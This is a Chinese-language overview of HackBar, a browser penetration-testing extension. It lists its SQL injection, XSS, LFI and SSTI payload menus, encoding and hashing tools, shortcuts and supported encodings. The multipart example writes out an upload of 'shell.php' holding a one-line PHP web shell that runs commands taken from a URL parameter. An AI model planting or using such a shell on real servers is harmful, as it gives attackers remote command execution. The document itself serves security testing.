HackBar
怎么打开?
- GET
- POST
- application/x-www-form-urlencoded
- multipart/form-data
- application/json
更多信息,请访问 https://github.com/0140454/hackbar/blob/master/README.md
自动测试
-
SQLi
转储所有数据库名称(MySQL、PostgreSQL)
- 从数据库中转储表(MySQL、PostgreSQL)
- 从数据库中转储列(MySQL、PostgreSQL)
- 联合选择语句(MySQL、PostgreSQL)
- 基于错误的注入语句(MySQL、PostgreSQL)
- 一次性转储有效载荷 (MySQL)
- 转储当前查询负载(MySQL)
-
跨站脚本
Html 编码/解码
-
LFI
-
SSTI
Jinja2 SSTI
-
编码
URL编码/解码
- Base64编码/解码
- 十六进制编码/解码
-
Hashing
MD5
- SHA1
- SHA256
- SHA512
快捷键
| 描述 | 默认 | MAC | | —- | —- | —- | | 加载 | Alt + A | Ctrl + A | | 切分 | Alt + S | Ctrl + S | | 执行 | Alt + X | Ctrl + X |
加载
- 默认值:Alt + A
-
切分
默认值:Alt + S
-
执行
默认值:Alt + X
- Mac:Ctrl + X
支持的enctype
multipart/form-data
改变后编码方式字段至multipart/form-data,可以把payload放入Body
字段,如下所示: ```http ———WebKitFormBoundarydbJBATDXCC6CL0lZ Content-Disposition: form-data; name=”user”
user ———WebKitFormBoundarydbJBATDXCC6CL0lZ Content-Disposition: form-data; name=”file”; filename=”shell.php” Content-Type: application/x-httpd-php
<?php passthru($_GET[‘c’]); ?> ———WebKitFormBoundarydbJBATDXCC6CL0lZ—
我们将把第一行作为边界,重新构造一个表单元素来发送您的请求。因此,发送的边界将与您键入的边界不同。
<a name="xzcMn"></a>
### application/json
改变后**编码方式**字段至application/json,可以把payload放入`Body`字段,如下所示:
```json
{
"username": "admin",
"password": "admin"
}
为了发布JSON数据,我们将在您的JSON中插入一个虚拟字段或对象,如下所示:
{"username":"admin","password":"admin","4dxnzjzd5mi":"="}
有关更多详情,请访问”用HTML表单发布JSON“。
第三方库
- Vue.js
- Vuetify.js
- crypto-js